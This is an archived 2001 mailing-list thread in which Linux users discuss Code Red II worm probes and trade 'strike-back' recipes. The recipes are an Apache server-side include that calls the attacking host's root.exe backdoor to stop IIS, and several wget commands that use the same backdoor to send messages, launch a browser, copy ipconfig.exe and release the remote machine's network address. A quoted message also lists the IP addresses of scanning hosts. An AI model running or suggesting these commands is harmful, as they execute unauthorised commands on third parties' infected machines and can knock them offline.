[NTLUG:Discuss] @home, Carrollton TX hits on port 80
Jack Snodgrass
idiotboy at cybermail.net
Sat Aug 11 09:21:06 CDT 2001
I don't think that this will work.
I tried, it but lynx called from apache has problems.
It complains that there is no terminal associated with the lynx process.
I'm using wget -o /dev/null now instead. It might work... but might not.
I tried to access several servers that tried to infect my server but they
were all busy. None of them were accepting connections. In order for this
to work, they would have to accept the connection and run the root.exe.
I also used:
/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
/c+net+send+%2A+Machine+%25COMPUTERNAME%25+has+been+infected+by+the+Code+
Red+II+worm+and+attacked+my+server"
/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
/c+net+send+%2A+Please+see+http://www.cert.org/advisories/CA-2001-23.html+
and+fix+this+server+ASAP."
/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
/c+explorer+http://www.myservername.net/code_red_worm.html"
/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
/c+copy+c:\winnt\system32\ipconfig.exe+."
/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/ipconfig.exe?+
/release"
( I added the line breaks ) and so far, no boxes have tried to access
my
http://www.myservername.net/code_red_worm.html
page. Either I'm doing something wrong... or I think.... the servers
just don't respond to the messages now.
I guess I could try and run this later when they are less busy infecting
other machines.
jack
----- Original Message -----
From: "Michael Collins" <mhtexcollins at austin.rr.com>
To: <discuss at ntlug.org>
Sent: Friday, August 10, 2001 9:20 PM
Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
> Saw this on alt.os.linux.slackware...thought you guys might be interested.
>
> Open httpd.conf and add:
> AddType text/html .ida
> AddHandler server-parsed .ida
>
> Restart apache with
> /var/lib/apache/sbin/apachectl restart
>
> Create the file /var/lib/apache/htdocs/default.ida with the following
> line:
> <!--#exec cmd="lynx -source
> http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
>
> Then sit back and watch the bastard machines shut themselves down.
>
> Note: This will not work on the original Code Red. That's the one that
> displays a string of "N" characters instead of "X" characters.
>
>
>
>
>
>
>
> J. Jentink wrote:
> > I am getting about 20 hits an hour right now over my @home cable in
> > Carrollton.
> >>From my web log, the following are the last few hitters: IP and
> > reverse DNS lookup
> > 24.0.40.151 cx1221131-b.elcjn1.sdca.home.com
> > 24.0.164.239 cx586708-a.fed1.sdca.home.com
> > 24.0.218.136 cx59931-a.dnpt1.occa.home.com
> > 24.0.162.42 cx487547-a.fed1.sdca.home.com
> > 24.0.154.161 cx112244-c.cv1.sdca.home.com
> > 24.0.162.42 cx487547-a.fed1.sdca.home.com
> > 24.0.212.47 cx47296-a.alsv1.occa.home.com
> > 24.0.147.21 cx512128-c.dt1.sdca.home.com
> > 24.0.235.235 c1517939-b.frndl1.wa.home.com
> > 24.0.49.245 c75556-f.potlnd1.or.home.com
> >
> > When I did the reverse DNS on my own IP, it maps to the form..
> > c*******-a.croltn1.tx.home.com
> > Looks like I an getting hammered by the @home folks on the west
> > coast... California, Washington and Oregon.
> >
> > My RD light on the cable modem also blinks constantly. I just
> > disconnect it when I am not using the internet. What fun.
> >
> > j.
> >
> >
> >
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >
> >
>
>
>
> --
> --
> Michael H. Collins Admiral: Penguinista Navy International
> http://www.linuxlink.com Migration
> Free Linux Email http://www.78704.com
> A great geek girl mp3 http://24.28.86.53
> This Ain't California http://geekaustin.com/
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
More information about the Discuss
mailing list